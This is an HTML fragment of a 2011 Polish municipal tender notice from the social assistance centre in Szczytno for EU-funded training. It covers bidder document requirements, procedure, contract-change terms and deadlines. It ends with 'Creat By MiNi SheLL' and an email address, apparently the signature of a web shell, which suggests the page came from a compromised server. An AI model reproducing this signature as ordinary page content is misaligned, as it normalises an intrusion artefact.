<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.zaparafowany projekt umowy każda parafowana  strona)-  załącznik nr 7 do SIWZ
2.Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień - w oryginale lub poświadczone notarialnie - jeżeli osobą podpisującą ofertę i załączniki do oferty nie jest osobą uprawnioną do reprezentowania wykonawcy, zgodnie z reprezentacją  wynikającą z załączonego do oferty zaświadczenia o wpisie do ewidencji działalności gospodarczej lub odpisu z właściwego rejestru. 
3.pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji  niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca będzie polegać na zasobach innych podmiotów  na zasadach określonych w art. 26 ust. 2B,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający określa następujące okoliczności, które mogą powodować konieczność
wprowadzenia istotnych zmian w treści zawartej umowy w stosunku do treści złożonej oferty: 
1  zmiana terminu rozpoczęcia lub zakończenia zajęć wywołanej w szczególności nieskompletowaniem na czas pełnej grupy szkoleniowej lub przyczynami niezależnymi od Wykonawcy i Zamawiającego ( np. działania siły wyższej );  
2 zmiana kadry dydaktycznej zaangażowanej w realizację szkolenia, wyłącznie w przypadku wystąpienia udokumentowanych nadzwyczajnych okoliczności uniemożliwiających prowadzenie zajęć szkoleniowych przez wskazanego w ofercie wykładowcę/trenera/instruktora  (w szczególności z powodu choroby, wypadku czy śmieci osoby), pod warunkiem złożenia przez wykonawcę pisemnego wniosku  w tej sprawie i po akceptacji przez Zamawiającego; Zaproponowane osoby powinny posiadać kwalifikacje i doświadczenie zawodowe co najmniej takie jak wykładowca, który ma zostać zastąpiony;
3. zmiany miejsca realizacji zajęć, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Wykonawcy. Zmiana ta nie może doprowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w SIWZ,
4. zmiany harmonogramu zajęć w uzasadnionych przypadkach i za zgodą Zamawiającego;
5. zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://szczytnogw.1.e-bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Szczytnie ul. Polska 49, 12-100 Szczytno, pok. nr 304, III piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.04.2011 godzina 09:00, miejsce: Gminny Ośrodek Pomocy Społecznej w Szczytnie, ul. Polska 49, 12-100 Szczytno, pokój nr 304, III piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt systemowy Aktywność i Integracja szansą na przyszłość współfinansowany ze środków Europejskiego Funduszu Społecznego,  Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com